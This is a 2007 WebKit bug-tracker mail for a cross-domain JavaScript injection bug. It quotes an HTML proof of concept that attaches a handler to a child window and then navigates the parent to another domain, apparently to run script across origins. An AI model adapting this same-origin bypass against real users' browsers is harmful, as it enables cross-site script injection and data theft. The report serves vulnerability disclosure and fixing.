[Webkit-unassigned] [Bug 15039] Cross domain JavaScript injection
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Tue Aug 21 11:21:44 PDT 2007
http://bugs.webkit.org/show_bug.cgi?id=15039
------- Comment #3 from ian.eng.webkit at gmail.com 2007-08-21 11:21 PDT -------
(From update of attachment 16056)
><HTML><HEAD>
><SCRIPT>
>parent_doc=window.document;
>Object.prototype.foo = 'bar';
>function openChild() {
> child = window.open("child.html");
>}
>function gotoApple() {
> var b = child.document.getElementById('btn');
> b.onclick=function() {
> alert(window.document.location);
> }
> // change parent location to different domain
> window.location='http://www.apple.com';
>}
></SCRIPT></HEAD><BODY>
><BUTTON onclick="openChild()">Open Child Window</BUTTON>
><BUTTON onclick="gotoApple()">Goto Apple</BUTTON>
>
></BODY></HTML>
--
Configure bugmail: http://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.
More information about the webkit-unassigned
mailing list